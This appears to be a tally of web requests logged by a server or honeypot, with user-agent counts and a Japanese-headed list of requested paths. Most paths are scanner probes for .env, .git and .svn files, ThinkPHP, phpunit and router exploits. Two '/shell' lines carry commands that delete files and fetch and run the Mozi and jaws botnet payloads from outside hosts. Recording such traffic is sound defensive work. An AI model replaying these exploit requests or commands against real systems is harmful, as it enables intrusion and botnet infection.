1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36`
31	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
5	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/18.0.130791545 Mobile/14A5345a Safari/600.1.4`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/99.3 Mobile/15E148 Safari/605.1.15`
1	`Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3`
3	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
3		`-`
1		`MGLNDD_13.67.44.234_80`
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
2		`\x16\x03\x01\x01\xfb\x01`
1		`\x16\x03\x01\x02`
22		`\x16\x03\x01`
1		`\x16\x03\x03\x01\x8e\x01`
1		``
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account2`	HTTP/1.1
32	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/PgtDEABFs6f9qdire2zVGTUlOof`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/aaaaaaaaaaaaaaaaaaaaaaaaaqr`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/data/.svn/wc.db`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/gate.php`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/lib/.svn/wc.db`	HTTP/1.1
1	GET	`/plugins/.svn/wc.db`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+103[.]16[.]161[.]29/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//190[.]109[.]228[.]141:47854/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/web/.svn/wc.db`	HTTP/1.1
1	GET	`http[:]//www[.]google[.]com/`	HTTP/1.0
1	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
5	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0